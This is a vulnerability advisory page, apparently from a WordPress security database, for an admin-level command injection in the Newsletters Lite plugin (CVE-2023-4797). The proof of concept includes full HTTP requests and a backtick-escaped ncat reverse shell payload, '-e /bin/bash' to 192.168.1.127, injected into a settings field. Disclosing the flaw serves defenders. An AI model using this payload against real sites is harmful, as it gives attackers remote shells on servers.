WordPress Plugin Vulnerabilities

Newsletter Lite < 4.9.3 - Admin+ Command Injection

Description

The plugin does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.

Proof of Concept

[1] Navigate to "Newsletters > Configuration > History & Emails Configuration"

======================

[2] Submit RCE Payload within "Archive Older Than" Field & Save Settings. The payload must be in HTTP parameter "emailarchive_olderthan" and escaped with backticks in format ` <PAYLOAD> `#, as shown below:

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.178.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

-- SNIP --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="theme_folder"

default2
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles[]"

newsletters-bootstrap
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles_handles[newsletters-bootstrap]"

-- SNIP --

======================

[3] Trigger the Payload by Navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving , then click "Run Now". The below GET request will be issued:

GET /wp-admin/admin.php?page=newsletters-settings-tasks&method=runschedule&hook=newsletters_emailarchivehook HTTP/1.1
Host: 192.168.178.130
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&wpmlupdated=true&wpmlmessage=Task+has+been+executed+successfully%21
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

======================

[4] The user's input will then be unsafely passed to PHP's exec() function, resulting in arbitrary command execution.

Affects Plugins

Plugin icon
newsletters-lite
Fixed in 4.9.3

References

CVE
CVE-2023-4797

Classification

Type
COMMAND INJECTION
OWASP top 10
A1: Injection
CWE
CWE-78
CVSS
9.1 (critical)

Miscellaneous

Original Researcher
Karolis Narvilas
Submitter
Karolis Narvilas
Submitter website
https://prisminfosec.com
Verified
Yes
WPVDB ID
de169fc7-f388-4abb-ab94-12522fd1ac92

Timeline

Publicly Published
2023-10-05 (about 7 months ago)
Added
2023-10-05 (about 7 months ago)
Last Updated
2023-10-05 (about 7 months ago)

Other

Published
Title
Published
2023-12-22
Title
Backup Migration < 1.4.0 - Authenticated (Admin+) OS Command Injection via url
Published
2022-07-22
Title
VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
Published
2024-05-09
Title
Unlimited Elements For Elementor (Free Widgets, Addons, Templates) < 1.5.103 - Admin+ Command Injection
Published
2022-10-18
Title
ImageMagick-Engine < 1.7.6 - Command Injection via CSRF
Published
2021-09-15
Title
PDF Light Viewer < 1.4.12 - Authenticated Command Injection